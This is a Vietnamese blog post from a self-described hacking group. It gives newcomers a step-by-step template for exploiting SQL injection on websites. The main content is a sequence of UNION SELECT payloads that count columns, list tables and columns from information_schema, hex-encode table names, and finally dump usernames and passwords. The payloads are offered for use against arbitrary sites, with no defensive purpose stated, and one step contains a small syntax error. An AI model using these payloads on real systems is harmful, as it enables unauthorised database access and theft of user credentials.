Hãy Like Cái Page và Theo dõi Trang để nhận được thông báo từ Adminstrator nhé!

Thứ Năm, 2 tháng 7, 2015

Khuôn check SQLi Basic

đăng lúc  01:57  |  in  Hacking - Bảo mật

Bài 1: Training For Newbie các bước CHECK Site lỗi SQL
  •  SQL Basic
  • -------------------------------------------------------------
  •  Khai thác lỗi SQL cơ bản:
  •  Bước 1: ORDER BY 100-- -
  •  Bước 2: UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -
  •  Bước 3: UNION SELECT 1,2,3,group_concat(TABLE_NAME),5,6,7,8,9 FROM information_schema.TABLES where table_schema=database()-- -
  • Các bạn lưu ý là những con số trên là con số mình ví dụ ko phải là con số thực ở các Website vì vậy hãy luôn linh hoạt trong việc check site
  •  Bước 4: UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9 FROM information_schema.COLUMNS WHERE table_schema=DATABASE()--
  •  Bước 5: UNION SELECT 1,2,3,group_concat(column_name),5,6,7,,8,9 FROM information_schema.COLUMNS WHERE table_schema=DATABASE() AND TABLE_NAME=0x... -- -

VD: User = 0xuser
Mã hóa "user" sang HEX: User = 75736572
Chú ý: ở chổ "..." là TABLE mà được mã hóa sang mã hex
=>>VD get được username và password
Ta thay thế "username và password" vào chổ Column_name để lấy hẳn thông tin chính xác cụ thể
  •  Bước 6: UNION SELECT 1,2,3,group_concat(username,0x20,password,0x20),5, 6,7,8,9 FROM TABLE_NAME

=> Đằng sau cụm FROM TABLE_NAME các bạn chú ý là chổ table_name đó là cái table mà bạn đã tìm được ở Bước số 3
Quý Huỳnh, Admin VN-Hacking Group
Copy xin để lại nguồn.
--------------------- The End Check Site SQL Basic --------------------

Chia sẽ bài viết này

Lưu ý và Thông báo

Trang của chúng tôi lập ra hoàn toàn chia sẽ miễn phí và không lấy bất kỳ khoản tiền nào của các bạn :) nên các bạn vui lòng tôn trọng chúng tôi nhé , Coppy tại trang chúng tôi vui lòng ghi nguồn để tôn trọng tác giã , và chúng tôi ghi nguồn của người khác khi đưa bài vào Blogspot chúng tôi Bấm vào đây để liên hệ chúng tôi.

0 nhận xét:

Liên hệ-Privacy Policy-Contact us
Copyright © 2015 Trang chia sẽ tài liệu học lập trình. Blogger được làm bởi Thành Long
Proudly Powered by Học Hacking.
back to top